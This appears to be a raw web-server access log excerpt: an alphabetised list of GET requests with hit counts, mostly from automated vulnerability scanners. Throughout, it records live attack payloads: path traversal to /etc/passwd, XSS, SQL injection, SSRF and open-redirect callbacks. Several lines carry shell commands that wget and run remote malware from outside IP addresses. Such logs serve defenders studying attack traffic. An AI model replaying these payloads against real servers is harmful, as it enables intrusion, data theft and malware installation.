1 GET /laravel-filemanager/download?file=passwd&type=Files&working_dir=%2F../../../../../../../../../../../../../../../../../../../etc HTTP/1.1
2 GET /latest/meta-data/ HTTP/1.1
1 GET /learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1
1 GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /libraries/joomla/database/ HTTP/1.1
1 GET /libs/cq/security/userinfo.json HTTP/1.1
1 GET /libs/granite/offloading/content/view.html HTTP/1.1
1 GET /libs/granite/ui/content/dumplibs.html HTTP/1.1
1 GET /libs/granite/ui/content/dumplibs.validate.html HTTP/1.1
1 GET /license.txt HTTP/1.1
1 GET /linuxki/experimental/vis/kivis.php?pid=0echo%20STARTcat%20/etc/passwdecho%20END&type=kitrace HTTP/1.1
1 GET /liquibase HTTP/1.1
1 GET /listconf?command=conf HTTP/1.1
1 GET /listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /listings/?foodbakery_locations_position=filter&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location&search_title&search_type=autocomplete HTTP/1.1
1 GET /live_check.shtml HTTP/1.1
1 GET /loader-wizard.php HTTP/1.1
1 GET /localhost.key HTTP/1.1
1 GET /log.log HTTP/1.1
1 GET /log.txt HTTP/1.1
2 GET /log/access.log HTTP/1.1
1 GET /log/debug.log HTTP/1.1
2 GET /log/error.log HTTP/1.1
1 GET /log/errors.log HTTP/1.1
1 GET /log/mobile.log HTTP/1.1
1 GET /log/system.log HTTP/1.1
1 GET /log/vpn.log HTTP/1.1
1 GET /log/warn.log HTTP/1.1
2 GET /log_download.cgi?type=../../etc/passwd HTTP/1.1
1 GET /logfile?d=crossdomain.xml HTTP/1.1
1 GET /loggers HTTP/1.1
1 GET /login.asp HTTP/1.1
1 GET /login.aspx HTTP/1.1
1 GET /login.do?message=9999*5555 HTTP/1.1
2 GET /login.htm HTTP/1.1
1 GET /login.html HTTP/1.1
1 GET /login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /login.php HTTP/1.1
1 GET /login.rsp HTTP/1.1
1 GET /login.stm HTTP/1.1
3 GET /login/ HTTP/1.1
1 GET /login/login.do?message=9999*5555 HTTP/1.1
1 GET /login?loginUrl=%2Findex HTTP/1.1
1 GET /login?next=/ HTTP/1.1
1 GET /login?next=\\\\\\interact.sh HTTP/1.1
1 GET /login?redirect=%2F HTTP/1.1
1 GET /loginLess/../../etc/passwd HTTP/1.1
6 GET /login HTTP/1.1
1 GET /logon.htm HTTP/1.1
1 GET /logon/LogonPoint/custom.html HTTP/1.1
1 GET /logon/LogonPoint/index.html HTTP/1.1
1 GET /logon/LogonPoint/tmindex.html HTTP/1.1
1 GET /logout?next=%208%22onmouseover=%22alert(document.domain) HTTP/1.1
1 GET /logs.txt HTTP/1.1
1 GET /logs/access.log HTTP/1.1
1 GET /logs/error.log HTTP/1.1
1 GET /logs/errors.log HTTP/1.1
1 GET /loyalty_enu/start.swe/%253E%2522%253E%252Fscript%253E%253Cscript%253Ealert%2528document.domain%2529%253C%252Fscript%253E HTTP/1.1
1 GET /lucee/admin/server.cfm HTTP/1.1
1 GET /lucee/admin/web.cfm HTTP/1.1
1 GET /m_login.htm HTTP/1.1
1 GET /magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C HTTP/1.1
1 GET /magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&pluginclass=CustomSQLUtility&plugintype=utilities HTTP/1.1
1 GET /magmi/web/js/magmi_utils.js HTTP/1.1
1 GET /main HTTP/1.1
1 GET /mainfile.php?Logon=%27%3Becho%20md5(TestPoc)%3B%27&_login=1&password=testpoc&username=test HTTP/1.1
1 GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1
1 GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1
1 GET /manage/fileDownloader?sec=1 HTTP/1.1
1 GET /manage/webshell/u?_=5621298674064&h=15&k=%0a&l=62&s=5&w=218 HTTP/1.1
1 GET /manage/webshell/u?_=5621298674064&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&s=5&w=218 HTTP/1.1
1 GET /management HTTP/1.1
1 GET /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 HTTP/1.1
2 GET /manager/html HTTP/1.1
1 GET /mantis/verify.php?confirm_hash&id=1 HTTP/1.1
1 GET /mantisBT/verify.php?confirm_hash&id=1 HTTP/1.1
1 GET /mantisbt-2.3.0/verify.php?confirm_hash&id=1 HTTP/1.1
1 GET /mediation/domains HTTP/1.1
1 GET /menu/neo HTTP/1.1
1 GET /menu/ss?force_setup=1&sid=nsroot&username=nsroot HTTP/1.1
1 GET /menu/stc HTTP/1.1
1 GET /message?msg=%26%23%3Csvg/onload=alert(1337)%3E%3B&title=x HTTP/1.1
2 GET /metadata/v1.json HTTP/1.1
1 GET /metrics HTTP/1.1
1 GET /mgmt/tm/sys/management-ip HTTP/1.1
1 GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1
1 GET /mobile/index.php HTTP/1.1
1 GET /mobile/shop/lg/mispwapurl.php?LGD_OID=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
1 GET /mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F13[.]67[.]44[.]234%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1 HTTP/1.1
1 GET /module/?class=x&data-show-ui=admin&from_url=http[:]//13[.]67[.]44[.]234&id=x&module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25height:100%25 HTTP/1.1
1 GET /module/?from_url=x&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&module=admin%2Fmodules%2Fmanage HTTP/1.1
1 GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1
1 GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1
1 GET /modules/babel/redirect.php?newurl=http[:]//interact[.]sh HTTP/1.1
1 GET /modules/system/assets/js/framework.combined-min.js HTTP/1.1
1 GET /monitoring/..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252fetc/passwd HTTP/1.1
1 GET /moto/application/configs/application.ini HTTP/1.1
1 GET /mrtg/ HTTP/1.1
1 GET /msa/../../../../../../../../etc/passwd HTTP/1.1
1 GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd HTTP/1.1
1 GET /mt.cgi HTTP/1.1
1 GET /mt/admin HTTP/1.1
1 GET /my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1
1 GET /my.key HTTP/1.1
1 GET /my.ppk HTTP/1.1
1 GET /mysql.initial.sql HTTP/1.1
1 GET /nagios/cgi-bin/status.cgi HTTP/1.1
1 GET /nagvis/frontend/nagvis-js/index.php HTTP/1.1
1 GET /names.nsf/People?OpenView HTTP/1.1
1 GET /neos/login HTTP/1.1
1 GET /net/net/net.html HTTP/1.1
1 GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1
1 GET /new/newhttp[:]//interact[.]sh HTTP/1.1
1 GET /nextcloud/index.php/login HTTP/1.1
1 GET /nginx-status HTTP/1.1
1 GET /nginx_status HTTP/1.1
1 GET /novius-os/admin/nos/login?redirect=http[:]//interact[.]sh HTTP/1.1
1 GET /nuclei.txt HTTP/1.1
1 GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1
1 GET /oamfed/idp/soap HTTP/1.1
1 GET /ocpu/ HTTP/1.1
1 GET /onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D HTTP/1.1
1 GET /onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ== HTTP/1.1
1 GET /opencats/ HTTP/1.1
1 GET /opensis/index.php HTTP/1.1
1 GET /openwin.php?redirurl=http[:]//interact[.]sh HTTP/1.1
1 GET /openx/www/delivery/lg.php?dest=http[:]//interact[.]sh HTTP/1.1
1 GET /otobo/index.pl HTTP/1.1
1 GET /overview.html HTTP/1.1
1 GET /ovirt-engine/ HTTP/1.1
1 GET /ovirt-engine/userportal/ HTTP/1.1
1 GET /ovirt-engine/webadmin/ HTTP/1.1
1 GET /owa/auth/logon.aspx?replaceCurrent=1&url=http[:]//13[.]67[.]44[.]234/ecp HTTP/1.1
1 GET /package-lock.json HTTP/1.1
1 GET /package.json HTTP/1.1
1 GET /packages.config HTTP/1.1
1 GET /page/exportImport/fileTransfer/2LM9bWjnQOPhnsIMKn11lyMBrVW.jsp HTTP/1.1
1 GET /pages/ajax.render.php?dashboard_id=1&layout_class=DashboardLayoutOneCol&operation=render_dashboard&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /pages/includes/status-list-mo%253Ciframe%2520src%253D%2522javascript%253Aalert%2528document.domain%2529%2522%253E.vm HTTP/1.1
1 GET /pages/login HTTP/1.1
1 GET /pages/sdcall/Login.jsp HTTP/1.1
1 GET /pantheon.upstream.yml HTTP/1.1
1 GET /php-fpm.conf HTTP/1.1
1 GET /php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1
1 GET /php/phpmyadmin/ HTTP/1.1
1 GET /php/ping.php?hostname=|dir HTTP/1.1
1 GET /php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E HTTP/1.1
1 GET /php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E HTTP/1.1
1 GET /phpMyAdmin/server_import.php HTTP/1.1
1 GET /phpminiadmin.php HTTP/1.1
1 GET /phpmyadmin/ HTTP/1.1
1 GET /phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /phpmyadmin/server_import.php HTTP/1.1
1 GET /phpmyadmin/setup/ HTTP/1.1
1 GET /phpspec.yml HTTP/1.1
1 GET /phpstan.neon HTTP/1.1
1 GET /pki/images/keyManager_title.ico HTTP/1.1
1 GET /plugin/build-metrics/getBuildStats?Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&Submit=Search&causeFilter&causeFilteringType=ALL&jobFilter&jobFilteringType=ALL&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&launcherFilter&launcherFilteringType=ALL&nodeFilter&nodeFilteringType=ALL&range=2&rangeUnits=Weeks HTTP/1.1
1 GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa&view=menu HTTP/1.1
1 GET /plugins/servlet/Wallboard/?cyclePeriod=alert(document.domain)&dashboardId=10000&dashboardId=10000 HTTP/1.1
1 GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http[:]// HTTP/1.1
1 GET /plugins/servlet/oauth/view-consumer-info HTTP/1.1
1 GET /plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1
1 GET /plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS HTTP/1.1
1 GET /plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1
1 GET /plugins/servlet/svnwebclient/error.jsp?description=test&errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1
1 GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd HTTP/1.1
1 GET /plugins/web/service/search/auto-completion/domain/en.xml?q=adm HTTP/1.1
1 GET /plus/ajax_street.php?act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin HTTP/1.1
1 GET /plus/carbuyaction.php?code=../../&dopost=return HTTP/1.1
1 GET /plus/download.php?link=aHR0cHM6Ly9pbnRlcmFjdC5zaA==&open=1 HTTP/1.1
1 GET /pma/server_import.php HTTP/1.1
1 GET /pma/setup/index.php HTTP/1.1
1 GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1
2 GET /pods HTTP/1.1
1 GET /pools/default/buckets HTTP/1.1
1 GET /portal/info.jsp HTTP/1.1
1 GET /portal/login HTTP/1.1
1 GET /private-key HTTP/1.1
1 GET /private.pem HTTP/1.1
1 GET /process/feries.php?fichier=../../../../../../../etc/passwd HTTP/1.1
1 GET /processwire/ HTTP/1.1
1 GET /profile HTTP/1.1
1 GET /proftpd.conf HTTP/1.1
1 GET /proxy?url=http%3a//0:8080/ HTTP/1.1
1 GET /prtg/index.htm HTTP/1.1
1 GET /prweb/PRAuth/app/default/ HTTP/1.1
1 GET /prweb/PRRestService/unauthenticatedAPI/v1/docs HTTP/1.1
1 GET /public/login.htm?type=probes HTTP/1.1
1 GET /public/login.htm?type=requests HTTP/1.1
1 GET /pureweb/server/login.jsp HTTP/1.1
1 GET /q?baba=lala&end=2020/10/25-15:56:44&grid=t&json&m=sum:sys.cpu.nice&o&start=2000/10/21-00:00:00&style=linespoint&wxh=1516x644&xrange=10:10&ylabel&yrange=[33:system(%27wget%20http[:]//interact[.]sh%27)] HTTP/1.1
1 GET /radio/application/configs/application.ini HTTP/1.1
1 GET /railsapp/config/storage.yml HTTP/1.1
1 GET /readme.html HTTP/1.1
1 GET /redis.conf HTTP/1.1
1 GET /redoc HTTP/1.1
1 GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1
1 GET /remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E HTTP/1.1
1 GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1
1 GET /remote/login HTTP/1.1
1 GET /remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /reports/rwservlet/showenv HTTP/1.1
1 GET /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp HTTP/1.1
1 GET /resin-doc/viewfile/?file=index.jsp HTTP/1.1
1 GET /resources/autogenerated/product-info.json HTTP/1.1
1 GET /responsiveUI/webmail/folder.xhtml HTTP/1.1
1 GET /rest/api/2/project?maxResults=100 HTTP/1.1
1 GET /rest/api/2/projectCategory?maxResults=1000 HTTP/1.1
1 GET /rest/api/2/resolution HTTP/1.1
1 GET /rest/api/2/screens HTTP/1.1
1 GET /rest/api/2/user/picker?query HTTP/1.1
1 GET /rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc HTTP/1.1
1 GET /rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm(2LM9cCpu99nOlIyMh021c0S2wxc)%3c%2fscript%3e&win=2707 HTTP/1.1
1 GET /robomongo.json HTTP/1.1
3 GET /robots.txt HTTP/1.1
1 GET /rootDesc.xml HTTP/1.1
1 GET /roundcube/logs/errors.log HTTP/1.1
1 GET /roundcube/logs/sendmail HTTP/1.1
1 GET /routes/error_log HTTP/1.1
1 GET /rsso/admin/ HTTP/1.1
1 GET /s/2LM9cQ7j9weygJvQFJB24AY9S1y/_/;/WEB-INF/web.xml HTTP/1.1
1 GET /s/2LM9d1OuFSvZTTJAe7s03CiHsM7/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1
1 GET /s/2LM9d80mg88hLlIBodrRnwiRHh0/_/%252e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1
1 GET /s/login HTTP/1.1
1 GET /s=set&_method=__construct&method=*&filter[]=system HTTP/1.1
1 GET /sap/admin/public/default.html HTTP/1.1
1 GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1
1 GET /sap/public/info HTTP/1.1
1 GET /saw.dll?bieehome&startPage=1 HTTP/1.1
1 GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1
1 GET /schema HTTP/1.1
1 GET /script/ HTTP/1.1
1 GET /scriptcase/devel/iface/ HTTP/1.1
1 GET /scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd HTTP/1.1
1 GET /search.php?search=%22wget+http%3A%2F%2F%27%22 HTTP/1.1
1 GET /search/members/?id%3D520)%2f%2funion%2f%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1` HTTP/1.1
1 GET /search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
1 GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1
1 GET /secure/Dashboard.jspa HTTP/1.1
1 GET /secure/ManageFilters.jspa?filter=popular&filterView=popular HTTP/1.1
1 GET /secure/QueryComponent!Default.jspa HTTP/1.1
1 GET /secure/popups/UserPickerBrowser.jspa HTTP/1.1
1 GET /security.yml HTTP/1.1
1 GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9 HTTP/1.1
1 GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1
1 GET /select_project.php?url=http[:]//interact[.]sh HTTP/1.1
1 GET /seminovos/application/configs/application.ini HTTP/1.1
1 GET /sendgrid.env HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /server.key HTTP/1.1
1 GET /server/sdk/rest/index.html HTTP/1.1
1 GET /service/0/test.oast.me HTTP/1.1
1 GET /service/rest/swagger.json HTTP/1.1
1 GET /service/v1/service-details HTTP/1.1
1 GET /services/%22%253E%253Cscript%253Ealert%28document.domain%29%253C/script%253E/services/ HTTP/1.1
1 GET /services/pluginscript/..;/..;/..;/getFavicon?host HTTP/1.1
1 GET /servlet/GetProductVersion HTTP/1.1
1 GET /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /servlet/taskProc?srcURL=https[:]//google[.]com&taskContentType=xml&taskEnv=xml&taskId=shortURL HTTP/1.1
1 GET /servlets/FetchFile?fileName=../../../etc/passwd HTTP/1.1
1 GET /session HTTP/1.1
1 GET /set_safety.shtml?r=52300 HTTP/1.1
1 GET /settings.php.bak HTTP/1.1
1 GET /settings.php.dist HTTP/1.1
1 GET /settings.php.old HTTP/1.1
1 GET /settings.php.swp HTTP/1.1
1 GET /settings.php.txt HTTP/1.1
1 GET /settings.py HTTP/1.1
1 GET /settings/settings.py HTTP/1.1
1 GET /setup/install.php HTTP/1.1
1 GET /sfmc/login HTTP/1.1
1 GET /sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?>helpFile=concepts.html&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!-- HTTP/1.1
2 GET /shell?cd+/tmp;rm+-rf+*;wget+45[.]12[.]253[.]180/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+5[.]255[.]105[.]71/76d32be0.sh;sh+/tmp/76d32be0.sh HTTP/1.1
2 GET /shell?cd+/tmp;rm+-rf+*;wget+94[.]158[.]247[.]123/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /shindig/gadgets/proxy?container=default&url=http[:]//oast[.]pro HTTP/1.1
1 GET /shop/application/configs/application.ini HTTP/1.1
1 GET /showfile.php?file=/etc/passwd HTTP/1.1
1 GET /simple/pages/UI.php HTTP/1.1
1 GET /site_admin/user/login HTTP/1.1
1 GET /site_cg/application/configs/application.ini HTTP/1.1
1 GET /sitecore/admin/login.aspx HTTP/1.1
1 GET /siteminderagent/forms/smaceauth.fcc?SMAUTHREASON=7&USERNAME=\\u003cimg\\u0020src\\u003dx\\u0020onerror\\u003d\\u0022confirm(document.domain)\\u0022\\u003e HTTP/1.1
1 GET /siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=7&USERNAME=\\u003cimg\\u0020src\\u003dx\\u0020onerror\\u003d\\u0022confirm(document.domain)\\u0022\\u003e HTTP/1.1
1 GET /slr/application/configs/application.ini HTTP/1.1
1 GET /sm/ess.do HTTP/1.1
1 GET /sm935/index.do HTTP/1.1
1 GET /snarf_ajax.php?ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&url=1 HTTP/1.1
1 GET /solr/ HTTP/1.1
2 GET /solr/admin/cores?wt=json HTTP/1.1
1 GET /source/loggin/page_log_dwn_file.hsp?action=download&fileName=..\\..\\..\\windows\\win.ini&h=44ea8a6603cbf54e245f37b4ddaf8f36 HTTP/1.1
1 GET /sphider/admin/admin.php HTTP/1.1
1 GET /spring-mvc-showcase/resources/%25255c%25255c..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/windows/win.ini HTTP/1.1
1 GET /sql.php HTTP/1.1
1 GET /sqlitemanager/ HTTP/1.1
1 GET /ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1
1 GET /ssl/13.67.44.234.key HTTP/1.1
1 GET /sslmgr HTTP/1.1
1 GET /sslvpn_logon.shtml HTTP/1.1
1 GET /stalker_portal/server/tools/auth_simple.php HTTP/1.1
1 GET /start.html HTTP/1.1
1 GET /static/%25255c%25255c..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/windows/win.ini HTTP/1.1
1 GET /static/ HTTP/1.1
1 GET /static/css//../../../../../../../../etc/passwd HTTP/1.1
1 GET /static?/%2557EB-INF/web.xml HTTP/1.1
1 GET /status.htm HTTP/1.1
1 GET /status.php HTTP/1.1
1 GET /status?full HTTP/1.1
1 GET /status HTTP/1.1
1 GET /store/app/etc/local.xml HTTP/1.1
1 GET /super/login.html?lang=en HTTP/1.1
1 GET /sws/index.html HTTP/1.1
1 GET /sympa?action=login&action_login&email&list&passwd&previous_action&previous_list&referer=http[:]//interact[.]sh HTTP/1.1
1 GET /sysadmin/phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET /sysinit.shtml?r=52300 HTTP/1.1
1 GET /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1
1 GET /system/login HTTP/1.1
1 GET /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1
1 GET /system/sling/info.sessionInfo.json HTTP/1.1
1 GET /system/sling/info.sessionInfo.txt HTTP/1.1
1 GET /systemController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd&down HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /tcpconfig.html HTTP/1.1
1 GET /telescope/requests HTTP/1.1
1 GET /test.php?action=config HTTP/1.1
1 GET /test/pathtraversal/master/..%25252f..%25252f..%25252f..%25252f../etc/passwd HTTP/1.1
1 GET /testing-put.txt HTTP/1.1
1 GET /theme/META-INF/prototype%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25afwindows/win.ini HTTP/1.1
1 GET /themes HTTP/1.1
1 GET /threaddump HTTP/1.1
1 GET /tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1
1 GET /tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1
1 GET /tiki-jsplugin.php?language=../../../../../../../../../../windows/win.ini&plugin=x HTTP/1.1
1 GET /tiki-login.php HTTP/1.1
1 GET /tiki-login_scr.php HTTP/1.1
1 GET /tmui/login.jsp HTTP/1.1
1 GET /tmui/tmui/login/welcome.jsp HTTP/1.1
1 GET /toLogin HTTP/1.1
1 GET /tool/view/phpinfo.view.php HTTP/1.1
1 GET /topic/e%27%2522%253E%253Cimg%2520src=x%2520onerror=alert%282%29%253E HTTP/1.1
1 GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F%60 HTTP/1.1
1 GET /trace HTTP/1.1
1 GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /ucmdb-api/connect HTTP/1.1
1 GET /uddiexplorer/ HTTP/1.1
2 GET /ui/ HTTP/1.1
1 GET /ui/login.php?user=admin HTTP/1.1
1 GET /ui/login/ HTTP/1.1
1 GET /ui/vault/auth HTTP/1.1
1 GET /ui/vropspluginui/rest/services/getstatus HTTP/1.1
1 GET /umbraco HTTP/1.1
1 GET /unified-console.html HTTP/1.1
1 GET /update.php HTTP/1.1
1 GET /upload.jsp HTTP/1.1
1 GET /upload/setup/install.php HTTP/1.1
1 GET /uploads/assets/backend/elfinder/elfinder-cke.html HTTP/1.1
1 GET /uploads/assets/backend/elfinder/elfinder.html HTTP/1.1
1 GET /uploads/elfinder/elfinder-cke.html HTTP/1.1
1 GET /user/login HTTP/1.1
1 GET /user/main HTTP/1.1
1 GET /user/scripts/login_par.js HTTP/1.1
1 GET /users/sign_in HTTP/1.1
1 GET /usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd HTTP/1.1
1 GET /v0.1/ HTTP/1.1
1 GET /v1.24/version HTTP/1.1
1 GET /v1/2LM9d49hdVakG06ceMWCfly4g4R.php HTTP/1.1
1 GET /v2/auth/roles HTTP/1.1
1 GET /var/resource_config.json HTTP/1.1
1 GET /vendor/composer/installed.json HTTP/1.1
1 GET /vendor/phpfastcache/phpfastcache/examples/phpinfo.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /vendor/webmozart/assert/.composer-auth.json HTTP/1.1
1 GET /versa/login.html HTTP/1.1
1 GET /version.txt HTTP/1.1
1 GET /version HTTP/1.1
1 GET /viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /vkd/GetWelcomeScreen.event HTTP/1.1
1 GET /vr2conf/login.html HTTP/1.1
1 GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml HTTP/1.1
1 GET /web-console/ServerInfo.jsp HTTP/1.1
1 GET /web.config.i18n.ashx?l=nuclei&v=nuclei HTTP/1.1
1 GET /web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract[.]sh HTTP/1.1
1 GET /web/database/selector/ HTTP/1.1
1 GET /web/phpmyadmin/ HTTP/1.1
1 GET /web/phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /web/settings/settings.py HTTP/1.1
1 GET /webEdition/showTempFile.php?file=../../../../etc/passwd HTTP/1.1
1 GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo()%20?%3E HTTP/1.1
1 GET /web_caps/webCapsConfig HTTP/1.1
